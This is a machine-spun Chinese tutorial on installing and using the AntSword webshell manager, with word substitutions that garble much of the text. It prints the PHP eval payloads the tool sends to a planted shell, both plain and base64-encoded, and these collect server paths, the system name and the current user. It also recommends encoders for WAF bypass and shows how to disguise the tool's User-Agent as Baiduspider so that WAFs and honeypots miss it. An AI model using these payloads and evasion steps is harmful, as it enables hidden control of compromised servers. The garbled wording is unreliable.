中国蚁剑是一款开源系统的混合开发网址可视化工具，它关键朝向于合理合法受权的网站渗透测试安全性工作人员及其开展基本实际操作的系统管理员。

通俗化的讲：中国蚁剑是 一 款比水果刀还牛的shell操纵端手机软件。

中国蚁剑青睐模块化设计的开发设计观念，遵照开源系统，就需要开得好看的标准，着眼于为不一样层级的群体出示最简单易懂、便捷立即的编码展现以及改动表明，勤奋让大伙儿能够一起为这一新项目奉献出有意义的事的一点一滴，让这个专用工具真实能让大伙儿用得顺意、舒服，让它能为大伙儿使出出最个性化最合适你的工作能力！

一、中国蚁剑免费下载

唯一官方网github下载链接：https://github.com/AntSwordProject/

留意：我们下载的情况下必须免费下载2个一部分，一个是新项目关键源代码”antSword“，另一个是加载器；加载器则分成三个版本号：Mac、Windows、Linux。

二、中国蚁剑安裝

因为我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”，我也以Windows版本号64位来实例了。

1、大家缓解压力“AntSword-Loader-v4.0.3-win32-x64.zip”后，双击鼠标“AntSword.exe”；

之一次安裝新项目必须先复位，假如你早已安装了关键源代码，就挑选新项目源代码的文件夹名称。（假如只安装了加载器，挑选一个空文件夹名称，加载器会全自动帮你下载关键新项目源代码）。

留意：这一新项目文件夹名称是你之后必须备份数据的，储存着你的shell和shell内的材料。

2、等复位进行后，再双击鼠标“AntSword.exe”就可以一切正常起动！

三、中国蚁剑应用

应用实际上跟水果刀基本上类似，仅仅蚁剑作用更强劲一些，下边就简易给大伙说说：

1、加上一个shell

更先：右键单击 - 加上数据信息；

次之：键入URL详细地址，联接登陆密码及其编号设定。PHP語言强烈推荐在线编辑器应用chr数据加密；

再度：假如必须自身写伺服电机的数据加密种类，能够按下面的图来实际操作：

从次：还能够配备shell的恳求信息内容和post內容；

最终：还能够配备全局 *** ；

2、软件

中国蚁剑有一个软件销售市场，能够安裝一些软件，软件有很多。下列是部分软件截屏：

3、有关伺服电机

伺服电机是这一程序流程的独到之处，用伺服电机数据加密能够轻轻松松绕开WAF。

何不，大家来比照一下默认设置不应用编号传送和base64编号传送的差别：

密文传送，post內容为：

[email protected]_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))[email protected]_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();

base64数据加密，post內容为：

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&[email protected](@base64_decode($_POST[_0x4ee8506e59871]));

留意：在其中，ant主要参数名字是shell登陆密码。

再讨论一下chr编号传送，彻底就所有编号了。

4、user-agent改动

要留意的是，手机软件默认设置的user-agent是：User-Agent: antSword/v2.0；并且绝大多数人都不容易去自定useragent，这就给waf和蜜獾白白的送了一个特点，因此我们要改动一下源码：

改动新项目相对路径：

antSword\modules\request.js （改动const USER_AGENT = 'antSword/v2.1'; 这一行编码！）

antSword\modules\update.js （有多处要改动；可检索“antSword/v2.0”来寻找这二行编码！）

我这里是把antSword/v2.0或antSword/v2.1改动以便Baiduspider-image，我改为了百度图片搜索引擎蜘蛛；

假如大伙儿有没有什么不明白的，请查询汉语使用说明：https://doc.u0u.us/zh-hans/